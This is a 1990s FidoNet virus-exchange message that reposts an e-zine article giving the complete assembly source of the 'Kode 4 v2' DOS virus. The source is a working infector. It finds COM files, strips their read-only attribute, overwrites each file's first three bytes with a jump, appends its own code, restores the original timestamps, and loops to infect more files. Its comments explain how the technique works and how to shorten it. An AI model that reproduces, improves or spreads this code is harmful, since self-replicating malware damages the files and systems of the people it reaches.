;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä ; Msg : 53 of 54 ; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17 ; To : - *.* - Fri 11 Nov 94 08:10 ; Subj : KOD4_399.ASM ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ;.RealName: Max Ivanov ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;* Kicked-up by MeteO (2:5030/136) ;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å) ;* From : Mark Hapershaw, 2:283/718 (06 Nov 94 17:58) ;* To : Mikko Hypponen ;* Subj : KOD4_399.ASM ;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ ;@RFC-Path: ;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 ;18.n283!not-for-mail ;@RFC-Return-Receipt-To: Mark.Hapershaw@f718.n283.z2.fidonet.org ;ÄÄÄÄÄÄÄÄÄÍÍÍÍÍÍÍÍÍ>>> Article From Evolution #2 - YAM '92 ; ;Article Title: Kode 4 v2 Virus ;Author: Soltan Griss seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h V_Length equ vend-vstart KODE4 proc far start label near db 0E9h,00h,00h vstart equ $ mov si,100h ;get si to point to 100 mov di,102h ;get di to point to 102 lback: inc di ;increment di mov ax,word ptr [si] ;si is ponting to ax cmp word ptr [di],ax ;compare ax with di loc jne lback ;INE go back and inc di mov ax,word ptr [si+1] cmp ax,word ptr [di+1] je lout jmp lback lout: add di,3h ;jmp stored in the end sub di,(v_length+100h) ;+3 to get to end and - mov si,di ; ;********************************************************************** ;* ;* The above code can be re-written as follows... ;* The above idea, although it works is very long in code.... ;* when DOS does a load and execute it pushes all registers the last ;* register to be pushed contains the file length. so just subtract ;* the current location ;********************************************************************** ; ; ; ;Host_Off: pop bp ; sub bp,offset host_off ; mov si,bp ; ;*** Before opening any file copy the original three bytes back to 100h ;*** Because they will get overwritten when you check any new files lea di,temp_buff add di,si mov ax,word ptr [di] mov cl,byte ptr [di+2] mov di,100h mov word ptr [di],ax mov byte ptr [di+2],cl mov ah,4Eh ;Find first Com file mov dx,offset filename ; offset of "*.com" add dx,si int 21h jnc back jmp done Back: mov ah,43h ;get rid of read only mov al,0 mov dx,9eh int 21h mov ah,43h mov al,01 and cx,11111110b int 21h mov ax,3D02h ;Open file for read/writing mov dx,9Eh ;get file name from file DTA int 21h jnc next jmp done next: mov bx,ax ;save handle in bx mov ah,57h ;get time date mov al,0 int 21h push cx ;put in stack for later push dx mov ax,4200h ; Move ptr to start of file xor cx,cx xor dx,dx int 21h mov ah,3fh ;load first 3 bytes mov cx,3 mov dx,offset temp_buff add dx,si int 21h xor cx,cx ;move file pointer to end of file xor dx,dx mov ax,4202h int 21h sub ax,3 ; Fix for real location push ax ; nop ; ; nop ; used for debugging ; nop ; ; nop ; ; nop mov di,offset temp_buff add di,si mov word ptr [j_code2+si],ax; Save two bytes in a ; word [jumpin] cmp byte ptr [di],0e9h ;look for a jmp at begining jne infect mov cx,word ptr [di+1] ;check for XXX bytes at end pop ax sub ax,v_length cmp ax, cx ; jump (id string to check) jne infect jmp finish infect: xor cx,cx ;move file pointer to begining xor dx,dx ;to write jump mov ax,4200h int 21h mov ah,40h ;write jump in first 3 bytes mov cx,3 mov dx, offset j_code1 add dx,si int 21h xor cx,cx ;move file pointer to end of file xor dx,dx mov ax, 4202h int 21h mov dx,offset vstart add dx,si ;Start writing at top of virus mov cx,(vend-vstart) ; Set for length of virus mov ah,40h ;Write Data into the file int 21h Finish: pop dx ;Restore old dates and times pop cx mov ah,57h mov al,01h int 21h mov ah,3Eh ;Close the file int 21h mov ah,4Fh ;Find Next file int 21h jc done jmp back done: mov bp,100h jmp bp filename db "*.com",0 DATA db " -=+ Kode4 +=-, The one and ONLY!$" j_code1 db 0e9h j_code2 db 00h,00h temp_buff db 0cdh,020h,090h ; CD 20 NOP kode4 endp vend equ $ seg_a ends end start ;-+- WM v2.09/91-0245 ; + Origin: The PRO-Point on a PRO-BBS and a PRO-*.* ...Ciaro?... (2:283/718) ;============================================================================= ; ;Yoo-hooo-oo, -! ; ; ; þ The MeÂeO ; ;/3 Enable 32-bit processing ; ;--- Aidstest Null: /Kill ; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)